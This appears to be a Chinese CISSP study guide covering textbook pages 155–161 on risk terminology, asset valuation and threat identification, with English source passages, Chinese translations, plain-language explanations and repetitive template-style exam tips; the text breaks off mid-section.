风险意识是指提高组织内对风险的认识的 努力。 这包括理解资产的价值、盘点可能损害这些资产的现有威胁,以及为应 对已识别风险而选择和实施的应对措施。 风险意识有助于使组织了解遵守安全 政策的重要性以及安全失败的后果。 风险术语与概念 风险管理使用大量术语,必须清晰理解。 本节定义并讨论所有重要的风险相关 术语:

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 16 / PDF P155

第 155 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Asset An asset is anything used in a business process or task. If an organization relies on a person, place, or thing, whether tangible or intangible, then it is an asset. Asset Valuation Asset valuation is the value assigned to an asset based on a number of factors, including importance to the organization, use in critical processes, actual cost, and nonmonetary expenses/costs (such as time, attention, productivity, and research and development). When performing a math-based risk evaluation (i.e., quantitative; see the “Quantitative Risk Analysis” section later in this chapter), a dollar figure is assigned as the asset value (AV).

Threats Any potential occurrence that may cause an undesirable or unwanted outcome for an organization or for a specific asset is a threat. Threats are any action or inaction that could cause damage, destruction, alteration, loss, or disclosure of assets or that could block access to or prevent maintenance of assets. They can be intentional or accidental. They can originate from inside or outside. You can loosely think of a threat as a weapon that could cause harm to a target. Threat Agent/Actors Threat agents or threat actors intentionally exploit vulnerabilities. Threat agents are usually people, but they could also be programs, hardware, or systems.

Threat agents wield threats to cause harm to targets. Aka attacker, adversary, or bad guy. Threat Events Threat events are accidental occurrences and intentional exploitations of vulnerabilities. They can also be natural or person-made. Threat events include fire, earthquake, flood, system failure, human error (due to a lack of training or ignorance), and power outage. Threat Vector A threat vector or attack vector is the path or means by which an attack or threat agent can gain access to a target to cause harm.

Threat vectors can include email, web surfing, external drives, Wi-Fi networks, physical access, mobile devices, cloud, social media, supply chain, removable media, and commercial software. Vulnerability The weakness in an asset or the absence or the weakness of a safeguard or countermeasure is a vulnerability. In other words, a vulnerability is a flaw, loophole, oversight, error, limitation, frailty, or susceptibility that enables a threat to cause harm.

中文直译 / 整理

资产 一个资产是指任何用于业务流程或任务的物品。 如果一个组织依赖 于人、地点或事物,无论是有形的还是无形的,那么它就是一种资产。 资产估值 资产估值 是根据多种因素为资产分配的价值,包括其对组织的重 要性、在关键流程中的用途、实际成本以及非货币性支出/成本(如时间、注 意力、生产力和研发)。 在执行基于数学的风险评估(即定量评估; 参见本 章后面的“定量风险分析”部分)时,会将一个美元金额作为资产价值( AV)分配。 威胁 任何可能对组织或特定资产造成不良或不希望发生后果的潜在事件都 是一种威胁。 威胁是指任何可能导致资产损坏、销毁、篡改、丢失或泄露, 或阻止访问资产、妨碍资产维护的行为或不作为。 威胁可能是故意的,也 可能是意外的; 可能源自内部,也可能来自外部。 你可以将威胁大致理解 为一种可能对目标造成伤害的武器。 威胁代理/行为者 威胁代理 或 威胁行为者 故意利用漏洞。 威胁代理通常 是人,但也可能是程序、硬件或系统。 威胁代理运用威胁对目标造成伤害。 也称为攻击者、对手或坏人。 威胁事件 威胁事件 是漏洞的意外发生和故意利用。 它们也可能是自然的 或人为的。

威胁事件包括火灾、地震、洪水、系统故障、人为错误(由 于缺乏培训或无知)以及断电。 威胁向量 威胁向量 或 攻击向量 是攻击者或威胁主体用于访问目标并造成损 害的路径或手段。 威胁向量可包括电子邮件、网页浏览、外部驱动器、 Wi‑Fi 网络、物理访问、移动设备、云、社交媒体、供应链、可移动介质和 商业软件。 漏洞 资产中的弱点,或防护措施或控制措施的缺失或弱点,即为漏洞。 换 句话说,漏洞是一种缺陷、漏洞、疏忽、错误、限制、脆弱性或易受攻击 性,它使威胁得以造成损害。

小白解释

场景先行:你是公司的安全负责人,正在读第 155 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 155 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 17 / PDF P156

第 156 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Exposure Exposure is being susceptible to asset loss because of a threat; there is the possibility that a vulnerability can or will be exploited by a threat agent or event. Exposure doesn't mean that a realized threat (an event that results in loss) is actually occurring, just that there is the potential for harm to occur. The quantitative risk analysis value of the exposure factor (EF) is derived from this concept. Risk Risk is the possibility or likelihood that a threat will exploit a vulnerability to cause harm to an asset and the severity of damage that could result. The more likely it is that a threat event will occur, the greater the risk.

The greater the amount of harm that could result if a threat is realized, the greater the risk. Every instance of exposure is a risk. When written as a conceptual formula, risk can be defined as follows: risk = threat * vulnerability or risk = probability of harm * severity of harm Safeguards A safeguard, security control, protection mechanism, or countermeasure is anything that removes or reduces a vulnerability or protects against one or more specific threats. This concept is also known as a risk response. A safeguard is any action or product that reduces risk through the elimination or lessening of a threat or a vulnerability.

Safeguards are the means by which risk is mitigated or resolved. It is important to remember that a safeguard need not involve purchasing a new product; reconfiguring existing elements and removing elements from the infrastructure are also valid safeguards or risk responses. Attack An attack is intentionally exploiting a vulnerability by a threat agent to cause damage, loss, or disclosure of assets, whether or not the attempt is successful. An attack can also be viewed as any violation or failure to adhere to an organization's security policy. A malicious event does not have to succeed in violating security to be considered an attack.

Breach A breach, intrusion, or penetration is when a security mechanism is bypassed or thwarted by a threat agent. A breach is a successful attack. Hazard

中文直译 / 整理

暴露 暴露 是由于威胁而导致资产损失的脆弱性; 存在漏洞可能被威胁代理 或事件利用的可能性。 暴露并不意味着威胁已经实际发生(即导致损失的事 件),而只是表明存在造成损害的潜在可能。 暴露因子(EF)的定量风险 分析值即源于此概念。 Risk 风险是指威胁利用漏洞对资产造成损害的可能性或概率,以及可能造成 的损害严重程度。 威胁事件发生的可能性越大,风险就越高; 如果威胁 实现后造成的损害越大,风险也就越高。 每一次暴露都是一种风险。 当 以概念公式表示时,风险可定义如下: 风险 = 威胁 * 漏洞 or 风险 = 损害概率 * 损害严重程度 防护措施 一种防护措施、安全控制、保护机制或应对措施,是指任何消除 或减少漏洞,或防范一个或多个特定威胁的手段。 此概念也称为风险应对。 防护措施是任何通过消除或减轻威胁或漏洞来降低风险的行为或产品。 防 护措施是降低或解决风险的手段。 需要注意的是,防护措施并不一定涉及 购买新产品; 重新配置现有元素或从基础设施中移除元素也是有效的防护 措施或风险应对方式。 攻击 一种攻击是指威胁主体故意利用漏洞以造成资产的损害、损失或泄 露,无论尝试是否成功。

攻击也可以被视为任何违反或未遵守组织安全政 策的行为。 恶意事件即使未成功违反安全,也应被视为攻击。 违规 一种违规、入侵或渗透是指安全机制被威胁主体绕过或挫败。 违规是一种成功的攻击。 危害

小白解释

场景先行:你是公司的安全负责人,正在读第 156 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 156 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 18 / PDF P157

第 157 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A hazard refers to a potential source or situation that has the capability to cause harm, loss, damage, injury, or adverse consequences to an organization, its assets, individuals, or the environment. Some of these risk terms and elements are clearly related, as shown in Figure 2.2. Threats exploit vulnerabilities, which results in exposure. Exposure is a risk, and risk is mitigated by safeguards. Safeguards protect assets that are endangered by threats. FIGURE 2.2 The cyclical relationships of risk elements There are many approaches to risk assessment. Some are initiated by evaluating threats, whereas others focus first on assets.

Whether a risk assessment starts with inventorying threats, then looks for assets that could be harmed, or starts with inventorying assets, then looks for threats that could cause harm, both approaches result in asset-threat pairings that then need to be risk evaluated. Both approaches have merit, and organizations should shift or alternate their risk assessment processes between these methods. When focusing first on threats, a broader range of harmful issues may be considered, without being limited to the context of the assets. But this may result in the collection of information about threats that the organization does not need to worry about as they don't have the assets or

中文直译 / 整理

一种危险源指的是可能对组织、其资产、个人或环境造成伤害、损失、 损害、伤害或不利后果的潜在来源或情况。 这些风险术语和要素中有许多密切相关,如图2.2所示。 威胁利用漏洞,从而导 致暴露。 暴露是一种风险,而风险可通过防护措施加以缓解。 防护措施保护那 些受到威胁损害的资产。 图2.2 风险要素的循环关系 风险评估有多种方法。 一些方法从评估威胁开始,而另一些则首先关注资产。 无论风险评估是先盘点威胁,再寻找可能受到损害的资产,还是先盘点资产, 再寻找可能造成损害的威胁,这两种方法最终都会产生资产‑威胁配对,这些配 对需要进一步进行风险评估。 两种方法各有优势,组织应在这些方法之间灵活 切换或交替使用其风险评估流程。 当优先关注威胁时,可以考虑更广泛的有害 问题,而不受资产上下文的限制。 但这也可能导致收集到组织无需担心的威胁 信息,因为它们不具备相应的资产或

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 157 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 19 / PDF P158

安全治理:定方向、定责任、定监督

治理负责让安全和组织目标对齐,并形成可监督的体系。

教材原文段落

vulnerabilities that the threat focuses on. When focusing first on assets, the entirety of organizational resources can be discovered without being limited to the context of the threat list. But this may result in spending time evaluating assets of very low value and low risk (which would or will be defined as acceptable risk), which may increase the overall time involved in risk assessment. Risk perspectives, also known as risk management perspectives or approaches, are different lenses through which organizations and individuals can view and address risks. Each perspective emphasizes certain aspects of risk and can guide decision-making, risk assessment, and mitigation strategies.

There are innumerable options of risk perspective, including asset, outcome, vulnerability, threat, financial, strategic, operational, compliance, legal, reputational, supply chain, third-party, and workforce. Each risk perspective offers a unique way to approach risk management and provides insights into different aspects of risk. An effective risk management strategy may incorporate elements of multiple perspectives to comprehensively assess and address risks based on their impact, likelihood, and the organization's specific objectives.

The general idea of a threat-based risk assessment was discussed in Chapter 1, “Security Governance Through Principles and Policies”—that is, threat modeling. The discussion of risk assessment in this chapter will focus on an asset-based risk assessment approach. Asset Valuation An asset-based or asset-initiated risk analysis starts with inventorying all organizational assets. Once that inventory is complete, a valuation needs to be assigned to each asset. The evaluation or appraisal of each asset helps establish its importance or criticality to the business operations. If an asset has no value, there is no need to provide protection for it.

A primary goal of risk analysis is to ensure that only cost-effective safeguards are deployed. It makes no sense to spend $100,000 protecting an asset that is worth only $1,000. Therefore, the value of an asset directly affects and guides the level of safeguards and security deployed to protect it. As a rule, the annual costs of safeguards should not exceed the potential annual cost of asset value loss. When the cost of an asset is evaluated, there are many aspects to consider. The goal of asset valuation is to assign to an asset a specific dollar value that encompasses tangible costs as well as intangible ones. Determining the exact

中文直译 / 整理

威胁所针对的漏洞。 当优先关注资产时,可以在不受威胁列表上下文限制的 情况下发现组织的所有资源。 但这也可能导致花费时间评估价值极低、风险 极低的资产(这些资产将被定义为可接受的风险),从而增加风险评估的总 体耗时。 风险视角,也称为风险管理视角或方法,是组织和个人观察和应对风险的不同 角度。 每种视角都强调风险的某些方面,并能指导决策、风险评估和缓解策略。 风险视角有无数种选择,包括资产、结果、脆弱性、威胁、财务、战略、运营、 合规、法律、声誉、供应链、第三方和人力资源。 每种风险视角都提供了独特 的方式来应对风险管理,并揭示了风险的不同方面。 有效的风险管理策略可能 结合多种视角的要素,以根据风险的影响、可能性以及组织的具体目标,全面 评估和应对风险。 威胁为基础的风险评估的一般概念在第1章“通过原则和政策实现安全治理” 中已讨论过——即威胁建模。 本章对风险评估的讨论将聚焦于以资产为基础的 风险评估方法。 资产估值 以资产为基础或以资产为起点的风险分析始于对所有组织资产的清点。 一旦完 成清点,就需要为每个资产分配价值。 对每个资产的评估或估价有助于确定其 对企业运营的重要性和关键性。

如果某个资产没有价值,则无需对其进行保护。 风险分析的主要目标是确保仅部署具有成本效益的防护措施。 花费10万美元保 护一个仅值1000美元的资产毫无意义。 因此,资产的价值直接影响并指导为保 护该资产而部署的防护措施和安全级别的高低。 通常,防护措施的年度成本不 应超过资产价值损失的潜在年度成本。 在评估资产成本时,需要考虑许多方面。 资产估值的目标是为资产赋予一个特 定的美元价值,该价值涵盖有形成本和无形成本。 确定资产的确切

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:治理负责让安全和组织目标对齐,并形成可监督的体系。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全治理:定方向、定责任、定监督”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

Policy 高层、强制、稳定;Procedure 具体步骤。

越早做威胁建模,修复成本越低。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
政策 政策是高层原则,说明必须遵守什么。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 20 / PDF P159

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

value of an asset is often difficult, if not impossible, but nevertheless, a specific value must be established in order to perform quantitative mathematical calculations. (Note that the discussion of qualitative versus quantitative risk analysis later in this chapter may clarify this issue; see the “Risk Assessment/Analysis” section.) Improperly assigning value to assets can result in failing to protect an asset or implementing financially infeasible safeguards properly.

The following list includes tangible and intangible issues that contribute to the valuation of assets: Purchase cost Development cost Administrative or management cost Maintenance or upkeep cost Cost of acquiring an asset Cost to protect or sustain an asset Value to owners and users Value to competitors Intellectual property or equity value Market valuation (sustainable price) Replacement cost Productivity enhancement or degradation Operational costs of asset presence and loss Liability of asset loss Usefulness Relationship to research and development Assigning or determining the value of assets to an organization can fulfill numerous requirements by: Serving as the foundation for performing a cost/benefit analysis of asset protection when performing safeguard selection Serving as a means for evaluating the cost-effectiveness of safeguards and countermeasures

中文直译 / 整理

价值通常很困难,甚至不可能,但 nevertheless,必须确立一个具体的价值, 以便进行定量数学计算。 (请注意,本章后面关于定性与定量风险分析的讨论 可能会澄清这一问题; 参见“风险评估/分析”部分。 )对资产错误估值可能导 致未能保护资产,或实施财务上不可行的防护措施。 以下列表包括影响资产估 值的有形和无形因素: 采购成本 开发成本 行政或管理成本 维护或保养成本 获取资产的成本 保护或维持资产的成本 对所有者和用户的价值 对竞争对手的价值 知识产权或股权价值 市场估值(可持续价格) 替代成本 生产力提升或下降 资产存在与损失的运营成本 资产损失的责任 有用性 与研发的关系 为组织分配或确定资产价值可以通过以下方式满足多种需求: 在选择防护措施时,作为执行资产保护成本/效益分析的基础 Servin g 作为评估保障措施成本效益的手段 和应对措施

小白解释

场景先行:你是公司的安全负责人,正在读第 159 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 21 / PDF P160

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Providing values for insurance purposes and establishing an overall net worth or net value for the organization Helping senior management understand exactly what is at risk within the organization Preventing negligence of due care/due diligence and encouraging compliance with legal requirements, industry regulations, and internal security policies If threat-based or threat-initiated risk analysis is being performed, asset valuation occurs after the organization discovers threats and identifies vulnerable assets to those threats. Identify Threats and Vulnerabilities An essential part of risk management is identifying and examining threats.

This involves creating an exhaustive list of all possible threats for the organization's identified assets. The list should include threat agents as well as threat events. Keep in mind that threats can come from anywhere. Threats to IT are not limited to IT sources or concepts. When compiling a list of threats, be sure to consider threats from a wide range of sources. For an expansive and formal list of threat examples, concepts, and categories, consult National Institute of Standards and Technology (NIST) Special Publication (SP) 800-30r1 Appendix D, “Threat sources,” and Appendix E, “Threat events.” For coverage of threat modeling, see Chapter 1.

In most cases, a team rather than a single individual should perform risk assessment and analysis. Also, the team members should be from various departments within the organization. It is not usually a requirement that all team members be security professionals or even network/system administrators. The team's diversity based on the organization's demographics will help to broadly identify and address a wider range of threats and risks.

中文直译 / 整理

为保险目的提供价值,并确定组织的整体净资产或净价值 帮助高级管理层准确了解在 组织内 防止疏忽应有的注意/尽职调查,并促进 遵守法律要求、行业法规和内部安全政策 如果正在进行基于威胁或威胁启动的风险分析,则资产估值发生在组织发 现威胁并识别出易受这些威胁影响的资产之后。 识别威胁和漏洞 风险管理的一个重要部分是识别和审查威胁。 这涉及为组织的已识别资产创建 一份详尽的潜在威胁清单。 该清单应包括威胁代理和威胁事件。 请记住,威胁 可能来自任何地方。 对IT的威胁不仅限于IT来源或概念。 在编制威胁清单时, 请务必考虑来自广泛来源的威胁。 有关威胁示例、概念和类别的全面正式清单,请参阅美国国家标准与技术研究 院(NIST)特别出版物(SP)800‑30r1附录D“威胁来源”和附录E“威胁事 件”。 有关威胁建模的覆盖内容,请参见第1章。 在大多数情况下,应由一个团队而非单个个体执行风险评估与分析。 此外, 团队成员应来自组织内的各个部门。 通常并不要求所有团队成员都是安全专 业人士甚至网络/系统管理员。 基于组织人口结构的团队多样性有助于广泛识 别和应对更广泛的风险与威胁。

小白解释

场景先行:你是公司的安全负责人,正在读第 160 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

NIST:NIST 提供美国常用安全标准、框架和指南。

应有谨慎:应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Due care 偏“做正确的事”。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
NIST NIST 提供美国常用安全标准、框架和指南。
应有谨慎 应有谨慎是采取合理行动,像一个负责组织应该做的那样去做。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 22 / PDF P161

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

The Consultant Cavalry Risk assessment is a highly involved, detailed, complex, and lengthy process. Often risk analysis cannot be properly handled by existing employees because of the size, scope, or liability of the risk; thus, many organizations bring in risk management consultants to perform this work. This provides a high level of expertise, does not bog down employees, and can be a more reliable measurement of real-world risk. However, even risk management consultants do not perform risk assessment and analysis on paper only; they typically employ risk assessment software.

This software streamlines the overall task, provides more reliable results, and produces standardized reports that are acceptable to insurance companies, boards of directors, and so on. Risk Assessment/Analysis Risk management is primarily the responsibility of upper management. However, upper management typically assigns risk analyses and risk response modeling tasks to a team from the IT and security departments. The results of the risk assessment team will be submitted as a proposal to upper management. Upper management will make the final decisions as to which responses are implemented by the organization.

It is the responsibility of upper management to initiate and support risk analysis and assessment by defining the scope and purpose of the endeavor. All risk assessments, results, decisions, actions, and outcomes must be understood and approved by upper management as an element in providing prudent due care/due diligence. “Prudent actions” and “reasonable actions” are terms used in legal and ethical contexts to describe different standards of behavior or decision-making, especially related to risk management. While these standards share some similarities, they have distinct meanings.

Prudent actions refer to actions or decisions that are marked by a high degree of caution, care, and foresight. They are characterized by careful consideration of potential risks, a focus on preventing harm, and a commitment to acting in a manner that is consistent with established best practices or industry standards. Prudent actions often involve taking additional precautions beyond what might be considered “reasonable” to ensure the highest level of safety and protection. Prudence

中文直译 / 整理

